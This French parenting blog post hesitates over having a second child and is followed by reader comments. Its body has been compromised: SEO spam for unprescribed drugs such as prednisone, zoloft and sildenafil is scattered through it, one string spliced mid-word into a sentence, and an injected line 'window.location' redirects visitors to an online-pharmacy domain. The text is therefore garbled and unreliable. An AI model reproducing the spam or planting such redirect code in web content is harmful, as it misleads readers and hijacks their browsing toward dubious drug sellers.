Manque de place

27 mai 2014 par  
Classé dans A la Une, Lifestyle, Maternité

order baclofen 20mg ( generic equivalent to lioresal) online, including baclofen 20mg ( generic equivalent send prescriptions, order forms and documents to:.

Quand on a un enfant de plus de 2 ans, on n’échappe pas à la très délicate question « Alors, le 2ème, c’est pour quand ?! ». Maintenant que les nuits « pleines » sont acquises, qu’on trouve un équilibre, un certain rythme, qu’entre la varicelle, les poux, la rosacée on maitrise les primordiaux, que 39,5° ne font plus peur, que les couches ne seront bientôt plus qu’un mauvais souvenir, il faudrait qu’on se relance. order prednisone online , buy prednisone, buy prednisone online, prednisone mg, buy cheap prednisone, prednisone cost, prednisone online.

L’excuse est toute trouvée : ni le temps ni l’énergie de replonger.
Et, plus rarement, je l’avoue : il y a derrière tout ça une très grosse appréhension, celle qui paralyse au moindre jour de retard ou semblant de nausée.

Je n’ai jamais envisagé d’avoir un enfant unique, ça n’est un cadeau pour personne, j’ai toujours pensé que 2, c’était bien. J’ai aimé avoir un grand frère et j’aime penser que, le plus tard possible, au moins, il restera lui.

C’est très exclusif comme relation, comme mode d’éducation, mais c’est celui que j’ai eu, et celui que j’aimerais voir se répéter, et je ne suis pas la 1 ère à vouloir reproduire le schéma familial. Seulement un enfant ça se fait à 2 et celui avec lequel j’ai envisagé cela est lui issu d’une famille nombreuses, 4, alors j’ai rapidement du m’affirmer, je m’arrêterai à 2.
J’ai aimé être enceinte, j’ai aimé accoucher, j’ai aimé chacune des étapes de ces 30 derniers mois. Je suis nostalgique du nourrisson mais me régale avec une petite fille.

Un 2ème on y pense forcément, et quand je mets en avant les freins (financiers, professionnels) me reste certainement le frein le plus évident : j’ai la trouille, la pétoche, le palpitant qui s’emballe.

Du très cliché « je l’aime tellement, je ne pourrais pas en aimer un ou une autre autant » au « Mais comment on peut aimer un autre enfant après celui qui vous a tout appris ». Alors je sais, on aime différemment mais autant, « c’est le cœur qui grossit » mais ça, j’ai encore du mal à l’envisager. Parce que ce 1 surgeons will be placing rows of micrografts in front and minigrafts a few rows behind sildenafil dapoxetine online buy no prescription sildenafil dapoxetine. er bébé, c’est celui qui m’a tout appris, qui a transformé 2 vies, si un 2ème arrivait aujourd’hui il ne bouleverserait pas autant le quotidien, on retrouverait nos repères, ce sera encore plus épuisant, éprouvant, mais ce ne serait pas une si grande découverte, et je ne sais pas s’il y aura autant d’émerveillement. L’envie et le besoin viscérale de le protéger, ça je n’en doute pas, mais quand on a déjà eu un bébé, est-ce qu’on peut vraiment avoir l’innocence des jeunes parents qui rend chaque jour formidable, qui fait qu’on passe outre l’épuisement ?

Je me doute que quand on n’a plus vraiment un rôle à apprendre on doit aussi plus profiter des petites choses, qu’il y a moins d’appréhensions, mais, j’en suis au stade ou je me dis que ce sont toutes ces découvertes, bonnes ou mauvaises, qui font qu’aujourd’hui il y a autant d’amour. Nous avions toutes les 2 tout à apprendre, aimer sans condition était en haut de la liste, et aujourd’hui, la liste est déjà pleine, alors ce fameux tic-tac-tic-tac, on va le laisser encore tourner un peu …
Order Online at USA Pharmacy! Prednisone Tablets 5mg Price . Fastest Shipping, prednisone online Overnight.
Best Prices For All Customers! generic zoloft Price . Express Delivery, generic zoloft By Greenstone.
Can you ceftin and coumadin buy ceftin online buy zoloft online . Buy sertraline online uk. Zoloft sale online . How much is zoloft without insurance. Sertraline 50 mg without prescription. Zoloft without 

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Comments

30 Réponses pour “Manque de place”
  1. « On retrouverait nos repères » ahahah. Le 2ème est un séisme. On pense ne plus avoir le temps avec un. On découvre qu’on en avait tellement.

    Et malgré tout, ma fille m’a réconciliée avec la maternité. Tout était plus éprouvant multiplié par 2 mais tellement plus simple avec elle.

  2. annouchka dit :

    Cet article j’aurais pu l’écrire… Je pensais que ce serait plus simple pour le 2ème et en fait je me rends compte que j’ai autant la trouille que la première fois :) Pourtant je connais le chemin, j’ai moi aussi la nostalgie de la grossesse, du nourrisson et du temps qui passe alors ça devrait être une évidence. Mais je sais aussi ô combien il est difficile de trouver un équilibre familial, surtout lorsqu’on travaille… Et cet équilibre difficilement trouvé, je ne sais pas si j’ai envie de le rompre tout de suite. Pourtant moi aussi mon « idéal » familial serait d’avoir deux enfants. Tant pis pour l’écart d’âge, on attendra le bon moment 😉
    Par contre je n’ai aucun doute sur le fait que le coeur grossit avec l’arrivée d’un 2ème, je suis vraiment très sereine sur ce point, et je suis d’autant plus rassurée qu’avec un 2ème, tu as moins peur de mal faire et que justement tu es davantage dans la découverte et l’émerveillement parce que moins stressée… En tout cas mes impressions m’ont souvent été confirmées par des mamans déjà multipares 😉 J’ai bon espoir que les liens se tissent plus vite avec un 2ème, mais peut-être que je me trompe ? (nan en fait on se pose trop de questions je crois !!! :d)

  3. Montaw dit :

    On était synchro pour le premier, je suis repartie pour le 2ème (je devrais accoucher d’ici un gros mois), car, comme toi, je ne voulais pas un enfant unique, et pour nous c’était le bon moment.
    Depuis deux ans et demi on a été émerveillés par chaque apprentissage et chaque évolution, et c’est vraiment du bonheur absolu de voir grandir notre petit bonhomme.
    Cela dit, même si c’est des choses qu’on a déjà vécues, je pense être tout autant en admiration devant ce deuxième petit garçon qui arrive car les enfants sont tous différents et pouponner une deuxième fois et découvrir la vie à 4 avec tous les ajustements que cela demande me ravit !
    Cela dit, vu comme ma grossesse est galère, contrairement à la première, ce sera deux épicétou, même pas en rêve je recommence derrière.
    Des bisous !

  4. blandine dit :

    si… on avait de la place
    si… on avait de l’argent (parce que bon à 800 euros la nounou faut pas se voiler la face, on attend l’école avec impatience)
    si… on ne se mariait pas bientôt…

    le second serait surement en route.
    j’aurais adoré avoir des enfants très rapprochés, ce n’est juste matériellement pas possible (et c’est pesant!)

    bisous 😉

  5. Estamillia dit :

    « il ne bouleverserait pas autant le quotidien »
    heuuu, comment te dire ?
    oui, passer de 1 à 2, ça fait les mêmes chamboulements que de 0 à 1
    on crois qu’on connait, qu’on a compris, et en fait on repart de zéro, on est paumé et épuisé
    c’est chouette hein, mais croire qu’un deuxième enfant ne chamboulera pas vos vie, ça me fait sourire, comme toi quand quelqu’un qui n’a pas d’enfant t’envoie des jugements à l’emporte pièce sur la parentalité :)

  6. Alors moi qui en ais trois, je ne vais pas te mentir . En effet, passer d’un enfant à deux, c’est un véritable séisme, comme un commentaire plus haut l’a dit . Il l’est d’autant plus si entre l’ainé et le deuxième, il y a une certaine marge d’âge parce que l’on s’est habitué à notre trio, cet équilibre, cette exclusivité . La venue d’un deuxième enfant est angoissante pour tout ce que tu as souligné pourtant, une fois cet autre enfant dans les bras, tout devient une évidence . Évidemment, on cafouille au début mais comme on le fait à chaque nouveau enfant mais après, crois moi, voir ses enfants, cette fratrie, cela n’a pas de mots . Cela se vit tout simplement .

    PS: le passage au troisième enfant se fait beaucoup plus sereinement, même si, évidemment, le travail est deux fois plus phénoménal ^_^

  7. matinbonheur dit :

    Avec ma deuz on redécouvre autrement ce qu’on croit connaître, on s’émerveille aussi fort que pour le premier.
    On est fatigué, peut être encore un plus parce qu’ils sont rapprochés, mais on sait gérer. Et on se rend compte qu’avant on avait le temps finalement…

  8. je confirme…le passage de 1 à 2 bouleverse….. tout!!! encore plus que de 0 à 1 dans notre cas!
    Quant à l’émerveillement, et bien mes filles sont tellement différentes l’une de l’autre que je découvre encore plein de choses avec ma cadette!

  9. lilu dit :

    je suis du meme avis que toi… et pour le moment je n’arrive pas à me décider malgré les demandes incessantes de ma princesse…

  10. Shalima dit :

    Chaque naissance, qu’elle soit la première, la deuxième ou même après, est un bouleversement, en fait. Une découverte, une nouvelle redistribution des cartes. Quasiment une nouvelle vie à chaque fois. Ces questions, tes questions, je me les suis posées pour chacun de mes 3 enfants. Et après, pour chacun également, je me suis demandée comment j’avais pu me les poser 😉

  11. Karen dit :

    Je suis exactement dans la même « flippe » du 2ème… Tout le monde nous pose la question, mon copain dit « Quand on aura rétabli la situation. » On imaginait notre vie à 4 mais on a déjà du mal à ne pas avoir les yeux qui se croisent à 3 :)

  12. Lucky Sophie dit :

    Autant d’émerveillement oui. Autant d’amour aussi. Moins de temps et plus de fatigue, c’est sûr. Mais le bon moment, c’est celui où les 2 parents sont prêts, pas celui qui semble logique vu l’écart d’âge…

  13. Madame Renard dit :

    Bon dieu que ça me parle.. parfois quand j’y pense j’en arrive presque à me dire « Comment je pourrais lui faire ça? Comment je pourrais partager l’amour que j’ai pour elle et le donner en partie à un autre? »

    Alors ici aussi, on laisse un peu l’horloge tourner..

  14. Mlle M dit :

    Ma mère a attendu 6ans avant d’en faire un 2e, elle voulait prendre sont temps … Je suis née un été en 1980 et ma sœur au printemps 1986. Ma maman est femme au foyer …

  15. Mlle M dit :

    son temps, pardon

  16. Clémence dit :

    Ma première a tout juste 4mois et tout est tellement parfait depuis le début que je me dis, un jour, peut-être, elle aura une petite sœur où un petit frère. Mais quand ? C’est tellement compliqué ! Pour le moment chaque jour est tellement merveilleux que je ne veux rien changer. Alors je comprends parfaitement tes inquiétudes ! Imaginé que moi, mon conjoint voudrait déjà que l’on recommence ! De mon côté, c’est impensable !

  17. MissBrownie dit :

    Chichi a beau être le 3ème, on s’émerveille comme si c’était le 1er.

  18. admin dit :

    @MissBrownie : non non non je n’irais pas jusqu’à 3 même si tu es tentante ! 😉

  19. admin dit :

    @Clémence : Oh tu as le temps, et c’est marrant, ce sont toujours les papas qui sont pressés, on ne doit vraiment pas vivre le même quotidien ! 😉

  20. admin dit :

    @mlle M : Pour le coup s’y remettre après 6 ans c’est drôlement courageux, toutes les étapes difficiles sont passées, ça doit être vraiment dur de s »y remettre !

  21. admin dit :

    @Madame Renard : c’est vrai que d’un côté je suis sure que ma fille sera une super grande soeur, et parfois, je me dis qu’elle n’est vraiment pas prête à partager !

  22. admin dit :

    @lucky Sophie : malheureusement je dois être beaucoup plus « terre à terre », je n’ai pas de congé maternité, pour la 1ère j’ai arrêté la veille et repris en sortant de l’hôpital donc je dois être beaucoup plus « logique » et placer la raison avant l’envie !

  23. admin dit :

    @Karen : pas mal pour résumer le tout le « Quand on aura rétabli la situation ». Je crois que quand on a des enfants on perd cette notion de contrôle, pas facile à accepter !

  24. admin dit :

    @shalima : honnêtement quand je vois des mamans comme toi, avec plus de 2 enfants et qui semblent tout gérer à la perfection, je me dis que vraiment, ça n’est pas fait pour moi ! J’imagine que tu es passée par toutes les étapes difficiles, personne n’y échappe, mais on peut plus ou moins bien les gérer, et aujourd’hui j’en suis sure, je n’en suis pas capable !

  25. admin dit :

    @Lilu : A chaque fois que je vais chercher ma fille à la garderie on me dit « elle s’est encore occupée des bébés toute la journée, elle adore ça » mais je tiens bon, gardons le contrôle et ne nous laissons pas influencer par les minus ! 😉

  26. admin dit :

    @La vie en Tisanie @Matinbonheur @Mamzelle Mistinguett @Estamilla @Isa : non non non, laissez moi mon innocence et mes idées fixes !

  27. admin dit :

    @Blandine : Oh félicitations pour le mariage ! Oui, nous en septembre c’est l’école et quand je dis qu’on attend aussi d’avoir plus de confort financièrement on me répond « On en pense pas à ça quand on fait des enfants ». OK mais à Paris quand on est trentenaires on peut difficilement se permettre de prendre une nounou à plein temps (sans parler du scandale des places en crèches …). Donc bien sur, matériellement, ça n’est pas possible et c’est une très bonne raison !

  28. admin dit :

    @Montaw : mais dis donc je ne savais pas !!! Félicitations !!! Allez, j’attends ton débrief avant de me lancer 😉

  29. admin dit :

    @annouchka : Oui, je sais qu’on en a souvent parlé 😉 Et finalement, c’est bien d’avoir une vraie différence d’âge entre les 2, ça fait vraiment grand frère / grande soeur, on a raison Anne, tenons bon !

  30. Latricia dit :

    You’ve got to be kidding me-it’s so tresapnrantly clear now!

Libère ton esprit

Dites ce que vous en pensez...
Et oh, si vous voulez une image avec votre commentaire, inscrivez vous sur gravatar!